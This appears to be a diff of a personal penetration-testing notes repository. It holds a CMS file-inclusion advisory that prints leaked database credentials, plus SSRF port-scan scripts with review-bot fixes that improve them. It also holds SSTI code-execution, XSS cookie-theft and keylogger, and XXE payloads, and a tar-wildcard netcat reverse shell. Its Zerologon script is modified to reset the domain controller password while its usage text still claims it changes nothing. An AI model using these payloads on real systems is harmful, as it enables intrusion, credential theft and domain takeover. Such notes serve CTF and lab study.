http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
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
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################


@ -0,0 +1,17 @@
#!/usr/bin/env python
import requests
s = requests.Session()
t = []
j = 0
for i in range(1, 65536):
r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}")
print(r.text)
if "Target is not reachable!" in r.text:
print(f"{i} is reachable, sum is {j}")
t.append(f"Port {i}, {r.text}")
else:
print (f"{i} not reachable")
print(t)
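Review bot: The check on the `if "Target is not reachable!" in r.text:` line is inverted — the branch that matches the server's "not reachable" message is the one that prints `{i} is reachable` and appends to `t`, so the list printed at the end holds the closed ports, and `j` is initialised but never incremented, so `sum is {j}` always reports 0. Negating the condition, `if "Target is not reachable!" not in r.text:`, and dropping `j` makes the output match its own messages. `s.get(...)` is also issued without a `timeout=`, so a single filtered port that never answers stalls the whole 65535-iteration loop; `s.get(url, timeout=3)` bounds that. The shebang is `#!/usr/bin/env python` while the body uses f-strings, so the file only runs where `python` resolves to 3.6 or newer; `#!/usr/bin/env python3` states the real requirement.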

8
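--- a/exploit/web/ssrf/curl.sh
+++ b/exploit/web/ssrf/curl.sh
@@ -0,0 +1,8 @@
+#!/usr/bin/env bash
+for x in {1..65535};
+do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \
+-w '%{size_download}');
+if [ $cmd != 1045 ]; then
+echo "Open port: $x"
+fi
+done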
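Review bot: `if [ $cmd != 1045 ]; then` breaks whenever curl produces no output — with `-s` a connection failure or timeout leaves `$cmd` empty, `[` then sees `[ != 1045 ]` and fails with a syntax error, and the loop carries on as if that port were open. Quote the expansion and guard the empty case: `if [ -n "$cmd" ] && [ "$cmd" != 1045 ]; then`. The URL argument on the `curl` line is unquoted too; the `?` in it is only left alone because no file in the working directory happens to match the glob, so `"http://10.10.214.67:8000/attack?url=http://2130706433:${x}"` is the safer form, and a `--max-time` on the curl call keeps one unresponsive port from stalling the whole range. The literal 1045 is the byte length of this target's "not reachable" response and deserves a comment saying so, e.g. `# 1045 = size of the "Target is not reachable" page for this host; re-measure per target`.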

31
exploit/web/ssrf/ip2dh.py Normal file

@ -0,0 +1,31 @@
"""
u can run this in the following format:
For decimal: python3 ip2dh.py D <Ip-address>
For Hexadecimal: python3 ip2dh.py H <Ip-address>
"""
#!/usr/bin/python3
import sys
if len(sys.argv) < 3:
print('\nYou must give desired format and IPv4 address as input...')
print('e.g.: D 192.168.10.100')
print('Valid formats D=Decimal H=Hexadecimal\n')
sys.exit(1)
Format = sys.argv[1]
def long(ip):
IP = ip.split('.')
IP = list(map(int, IP))
LongIP = IP[0]*2**24 + IP[1]*2**16 + IP[2]*2**8 + IP[3]
return LongIP
ip = long(sys.argv[2])
if Format == 'D':
print('\nIP as Decimal format: %s' % (ip))
if Format == 'H':
print('\nIP as Hexadecimal format: %s' % (hex(ip)))
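Review bot: The `#!/usr/bin/python3` line sits after the module docstring, so it is an ordinary comment rather than a shebang; the docstring above it documents running the file directly (`python3 ip2dh.py D <Ip-address>`), so the shebang should be line 1. The `Format` handling accepts `D` and `H` but prints nothing at all for any other value; an `else:` that prints the usage and calls `sys.exit(1)` would surface typos instead of exiting 0 silently. `long()` also trusts the dotted string it is given: fewer than four octets raises an IndexError inside the arithmetic and octets above 255 are silently folded into the neighbouring byte, so a check such as `if len(IP) != 4 or any(not 0 <= o <= 255 for o in IP): sys.exit(1)` before the arithmetic would reject malformed input with a clear message.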

26
exploit/web/ssrf/ssrf.md Normal file

@ -0,0 +1,26 @@
# Server Side Request Forgery (SSRF)
is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.
## Usage
### Sanity Test Service
Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
```
http://127.0.0.1:3306
http://localhost:5432
http://0.0.0.0:53
```
* IPv6
```
http://[::]:3306
http://:::3006
```
* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)
### Reading files
```
file:///etc/passwd
```
### Tools
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)

59
exploit/web/ssti/ssti.md Normal file

@ -0,0 +1,59 @@
# Server Side Template Injection (SSTI)
Pass in parameters to control the template.
## Usage
* Sanity test
```python
{{2+2}}
```
* Flask template LFI
```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
```
* Executing commands
```sh
{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
```
* RCE on server
```python
{{config.__class__.__init__.__globals__['os'].popen(<command>).read()}}
```
## Identification of Template Engine
Identify via payload checking
* Smarty: `a{*comment*}b`
* Mako: `${"z".join("ab")}`
* Twig or Jinja2
```sh
{{7*7}}
{{7*'7'}}
```
## Tools
### TPlmap
```sh
git clone https://github.com/epinna/tplmap.git
pip2 install -r requirements
```
|HTTP Method|Parameter|
|-----------|---------|
|GET|`tplmap -u <url>/?<vulnparam>`|
|POST|`tplmap -u <url> -d '<vulnparam>'`|
* Using remote command
```
tplmap -u http://<ip>:<port>/ -d '<vulnparam>' --os-cmd "cat /etc/passwd"
```
### Countermeasure
* Remove everything in user input but alnum. Passing data, not data to f-string.
```python
input = re.sub("[^A-Za-z0-9]", "", input)
template = "User input is {{ input }}"
return render_template_string(template, input=input)
```

@ -0,0 +1 @@
Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98


@ -0,0 +1,3 @@
# URL Forgery
* Just change parts of the URL

106
exploit/web/xss.md Normal file

@ -0,0 +1,106 @@
# Cross-Site Scripting
A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.
## Stored XSS
This is where a malicious string originates from the websites database.
### Examples
* Sanity test by changing DOM content
```
<script>document.getElementById('myIdName').innerHTML="napf"</script>
```
* Cookie stealing
```
<script>document.location='/log/'+document.cookie</script>
```
* Navigte to `/logs` and take sid
## Reflected XSS
In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
### Usage
As script inside parameter
```sh
http://example.com/search?keyword=<script>...</script>
```
* Show server IP
```
http://example.com/reflected?keyword=<script>alert(window.location.hostname)</script>
```
## DOM based XSS
With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
```javascript
var keyword = document.querySelector('#search')
keyword.innerHTML = <script>...</script>
```
### Usage
* Find the sub-object inside the document
```javascript
test" onmouseover="alert('YO!')"
```
* Show cookie
```
test" onmouseover="alert(document.cookie)"
```
## Bypass Filters
* `<script>` sanitizing
```HTML
<img src=x onerror=alert('Hello');>
```
or
```javascript
<</script>script>alert("1")<</script>/script>
```
* `alert()` sanitizing
```javascript
0\"autofocus/onfocus=alert(1)--><onerror=prompt(2)>"-confirm(3)-"
```
or
```javascript
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
```
* Strings, here its `Hello`
```javascript
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
```
## Portscanner via Javascript
* By requesting the favicon, checking port 80
```javascript
<script>
for (let i = 0; i < 256; i++) {
let ip = '192.168.0.' + i
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
document.body.innerHTML += code
}
</script>
```
* [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
## Keylogger
```javascript
<script type="text/javascript">
let l = ""; // Variable to store key-strokes in
document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable
console.log(l); // update this line to post to your own server
}
</script>
```
## Protection Methods
There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.
1. Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;


@ -0,0 +1,78 @@
# XML External Entity (XXE)
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
## Document Type Definition (DTD)
A DTD defines the structure and the legal elements and attributes of an XML document.
* Example file content of `note.dtd`
```
<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>
```
* !DOCTYPE note - Defines a root element of the document named note
* !ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
* !ELEMENT to - Defines the `to` element to be of type "#PCDATA"
* !ELEMENT from - Defines the `from` element to be of type "#PCDATA"
* !ELEMENT heading - Defines the `heading` element to be of type "#PCDATA"
* !ELEMENT body - Defines the `body` element to be of type "#PCDATA"
NOTE: #PCDATA means parseable character data.
* Resulting XML doc follows
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>falcon</to>
<from>feast</from>
<heading>hacking</heading>
<body>XXE attack</body>
</note>
```
## Replacing XML content
* Name in the example
```xml
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
```
* System call inside entity
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root>
<name>sdafsa</name>
<tel>789731421</tel>
<email>&xxe;</email>
<password>12345</password>
</root>
```
```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
```
* PHP expect using syscalls
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<root>
<email>&xxe;</email>
<password>12345</password>
</root>
```
## Tools
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe)


@ -0,0 +1,13 @@
# Wildcard usage
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
## Another Example
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```


@ -0,0 +1,4 @@
# Impacket
* [Repo](https://github.com/SecureAuthCorp/impacket)

@ -0,0 +1 @@
Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78

@ -0,0 +1 @@
Subproject commit 2b944b52ee30f8833a21f0805d2627ca1f15383a


@ -0,0 +1,57 @@
# Zero Logon
[CVE-2020-1472](http://cve.circl.lu/cve/CVE-2020-1472)
## MS-NRPC (Microsoft NetLogon Remote Protocol)
* ComputeNetlogonCredential
* IV is `0` of AES-CFB8
* Machine accounts got no limit on failed login attempts (64 bit alnum password)
## Kill Chain
Zero Logon to bypass authentication on the Domain Controller's Machine Account -> Run `Secretsdump.py` to dump credentials -> Crack/Pass Domain Admin Hashes -> ??? -> Profit
## MS-NRPC Logon
* Netlogon handshake between Client (domain-joined computer) and Server (domain-controller).
* RPC traffic
```mermaid
sequenceDiagram
participant Client
participant Server
Client ->> Server: Client challenge
Server ->> Client: Server challenge, Session Key = KDF(secret, challenges)
Client ->> Server: Client credential, Encrypt(K_sess, client challenge)
Server ->> Client: Client credential, Encrypt(K_sess, client challenge)
Client ->> Server: Signed + sealed with session key: Procedure call with authenticator
```
* Zero Logon attack. Zeroing parameters and retrying handshakes with an empty password on the domain controller.
```mermaid
sequenceDiagram
participant Client
participant Server
Client ->> Server: NetrServerReqChallenge (challenge=0000...00)
Server ->> Client: Server Challenge
Client ->> Server: NetrServerAuthenticate3 (identity=DC; credential=0000...00; sign/seal=0)
Server ->> Client: OK
Client ->> Server: NetrServerPasswordSet2 (target=DC; authenticator=0000...00; timestamp=0; enc.password=0000...00)
```
1. Client sends 16 Bytes of `0` as Nonce to domain-controller
2. Server receives NetServerReqChallenge and generates challenge (Nonce). Sends it to the client.
3. __NetrServerAuthenticate3__ method is generated as NetLogon credentials. Contains the following
1. __Custom Binding Handle__
2. __Account Name__
3. __Secure Channel Type__, nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
4. __Computer Name__, Domain Controller DC01
5. __Client Credential String__, 16 Bytes of `\x00`
6. __Negotiation Flags__, value observed from a Win10 client with Sign/Seal flags disabled: 0x212fffff Provided by Secura
4. NetrServerAuthenticate is received by server. Responds success if positive to the client.
5. If same values is calculated by the server, mutual agreement is confirmed by the client as well.
## PoC
* [Secura's PoC](https://github.com/SecuraBV/CVE-2020-1472)
* [NetrServerPasswordSet2](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81)
* [NetServerAuthenticate3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9)
* [Authenticator](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/76c93227-942a-4687-ab9d-9d972ffabdab)
* [NETLOGON_CREDENTIALS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/d55e2632-7163-4f6c-b662-4b870e8cc1cd)


@ -0,0 +1,100 @@
#!/usr/bin/env python3
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
def fail(msg):
print(msg, file=sys.stderr)
print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
sys.exit(2)
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
# Connect to the DC's Netlogon service.
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
# Use an all-zero challenge and credential.
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', ciphertext, flags
)
# It worked!
assert server_auth['ErrorCode'] == 0
# ADDED BY mnemonic_daemon
#
newPassRequest = nrpc.NetrServerPasswordSet2()
newPassRequest['PrimaryName'] = dc_handle + '\x00'
newPassRequest['AccountName'] = target_computer + '$\x00'
newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
auth = nrpc.NETLOGON_AUTHENTICATOR()
auth['Credential'] = b'\x00' * 8
auth['Timestamp'] = 0
newPassRequest['Authenticator'] = auth
newPassRequest['ComputerName'] = target_computer + '\x00'
newPassRequest['ClearNewPassword'] = b'\x00' * 516
rpc_con.request(newPassRequest)
return rpc_con
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
return None
else:
fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
except BaseException as ex:
fail(f'Unexpected error: {ex}.')
def perform_attack(dc_handle, dc_ip, target_computer):
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
print('Performing authentication attempts...')
rpc_con = None
for attempt in range(0, MAX_ATTEMPTS):
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
if rpc_con == None:
print('=', end='', flush=True)
else:
break
if rpc_con:
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
else:
print('\nAttack failed. Target is probably patched.')
sys.exit(1)
if __name__ == '__main__':
if not (3 <= len(sys.argv) <= 4):
print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
sys.exit(1)
else:
[_, dc_name, dc_ip] = sys.argv
dc_name = dc_name.rstrip('$')
perform_attack('\\\\' + dc_name, dc_ip, dc_name)

592
hashes/hash-id.py Normal file

@ -0,0 +1,592 @@
#!/usr/bin/env python
# encoding: utf-8
# Hash Identifier
# By Zion3R
# www.Blackploit.com
# Root@Blackploit.com
from builtins import input
from sys import argv, exit
version = 1.2
logo=''' #########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################'''
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", 
"106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
# hash.islower() minusculas
# hash.isdigit() numerico
# hash.isalpha() letras
# hash.isalnum() alfanumerico
def CRC16(hash):
hs='4607'
if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101020")
def CRC16CCITT(hash):
hs='3d08'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101040")
def FCS16(hash):
hs='0e5b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101060")
def CRC32(hash):
hs='b33fd057'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102040")
def ADLER32(hash):
hs='0607cb42'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102020")
def CRC32B(hash):
hs='b764a0d9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102060")
def XOR32(hash):
hs='0000003f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102080")
def GHash323(hash):
hs='80000000'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103040")
def GHash325(hash):
hs='85318985'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103020")
def DESUnix(hash):
hs='ZiY8YtDKXJwYQ'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
jerar.append("104020")
def MD5Half(hash):
hs='ae11fd697ec92c7c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105060")
def MD5Middle(hash):
hs='7ec92c7c98de3fac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105040")
def MySQL(hash):
hs='63cea4673fd25f46'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105020")
def DomainCachedCredentials(hash):
hs='f42005ec1afe77967cbc83dce1b4d714'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106025")
def Haval128(hash):
hs='d6e3ec49aa0f138a619f27609022df10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106160")
def Haval128HMAC(hash):
hs='3ce8b0ffd75bc240fc7d967729cd6637'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106165")
def MD2(hash):
hs='08bbef4754d98806c373f2cd7d9a43c4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106060")
def MD2HMAC(hash):
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106120")
def MD4(hash):
hs='a2acde400e61410e79dacbdfc3413151'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106040")
def MD4HMAC(hash):
hs='6be20b66f2211fe937294c1c95d1cd4f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106100")
def MD5(hash):
hs='ae11fd697ec92c7c98de3fac23aba525'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106020")
def MD5HMAC(hash):
hs='d57e43d2c7e397bf788f66541d6fdef9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106080")
def MD5HMACWordpress(hash):
hs='3f47886719268dfa83468630948228f6'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106140")
def NTLM(hash):
hs='cc348bace876ea440a28ddaeb9fd3550'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106029")
def RAdminv2x(hash):
hs='baea31c728cbf0cd548476aa687add4b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106027")
def RipeMD128(hash):
hs='4985351cd74aff0abc5a75a0c8a54115'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106180")
def RipeMD128HMAC(hash):
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106185")
def SNEFRU128(hash):
hs='4fb58702b617ac4f7ca87ec77b93da8a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106200")
def SNEFRU128HMAC(hash):
hs='59b2b9dcc7a9a7d089cecf1b83520350'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106205")
def Tiger128(hash):
hs='c086184486ec6388ff81ec9f23528727'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106220")
def Tiger128HMAC(hash):
hs='c87032009e7c4b2ea27eb6f99723454b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106225")
def md5passsalt(hash):
hs='5634cc3b922578434d6e9342ff5913f7'
